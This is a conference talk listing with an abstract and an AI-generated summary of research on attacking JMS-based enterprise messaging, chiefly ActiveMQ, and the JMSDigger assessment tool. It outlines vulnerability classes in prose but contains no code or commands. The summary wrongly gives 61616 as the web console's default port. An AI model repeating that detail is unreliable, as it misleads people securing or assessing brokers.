Presentation Material
Abstract
Audio of session: https://www.youtube.com/watch?v=09uc435FEWY&list=PLpr-xdpM8wG8ODR2zWs06JkMmlRiLyBXU&index=29 Message Oriented Middleware (MOM) allows disparate applications to communicate with each other by exchanging information in the form of messages. A MOM and its clients create an enterprise messaging application that forms the transactional backbone of several large organizations worldwide. Security is therefore an important aspect of these applications. This research analyzes enterprise messaging security from three different perspectives: 1. The first perspective derives from the fact that most of the enterprise messaging products support the vendor-agnostic Java Messaging Service (JMS) API and therefore focuses on the offensive uses of the JMS API to attack an enterprise messaging application. 2. The second perspective revolves around a JMS compliant message broker (or MOM) as message brokers form the core of the enterprise messaging. I chose ActiveMQ for my research as it is open source and among the most popular message brokers that support JMS API. I will discuss a few ActiveMQ 0days vulnerabilities, potential flaws in its various authentication schemes and its configuration defaults that can make it vulnerable to attacks. 3. The third perspective focuses on a new tool JMSDigger that can be leveraged to engage and assess enterprise messaging applications. Several live demonstrations will show attacks such as authentication bypass, JMS destination dumps, 0day vulnerabilities and JMSDigger etc..
AI Generated Summary
This talk addresses the significant security neglect surrounding enterprise messaging systems, specifically those implementing the Java Message Service (JMS) standard. These asynchronous systems form the transaction backbone for many financial and large organizations but are often assumed secure due to their internal, legacy nature.
The speaker introduced JMS Digger, an open-source assessment tool written using the JMS API. Its core functionality includes testing authentication mechanisms, brute-forcing credentials, intercepting and categorizing message streams (by type like Text or Object messages), and manipulating durable subscribers. While initially targeting ActiveMQ, its generic JMS code allows application to other brokers.
Key vulnerabilities presented focus on ActiveMQ. A critical finding was its historically unprotected web administration interface (default port 61616), which allowed unauthenticated access to create/delete destinations and read sensitive queued messages. Several instances of this interface exposed directly to the internet were identified. Other issues included a cross-site scripting (XSS) flaw in the message scheduler, SSL/TLS misconfigurations enabling man-in-the-middle attacks due to poor certificate validation, and a fundamental flaw in password storage: ActiveMQ encrypts (not hashes) stored passwords using a key-derived scheme, enabling efficient offline brute-force decryption of configuration files. Furthermore, custom JMS-based authentication plugins (e.g., connecting to LDAP/MySQL) were shown vulnerable to SQL injection, allowing complete authentication bypass.
The practical implications are severe. An attacker can intercept or steal business-critical messages (PII, financial data), disrupt operations by deleting queues, pivot internally via XSS, or gain full broker access through weak or bypassable authentication. The talk concludes that enterprise messaging security is a critical, overlooked attack surface requiring dedicated assessment, proper configuration (disabling default accounts, enforcing encryption), and secure coding practices for any custom authentication integrations.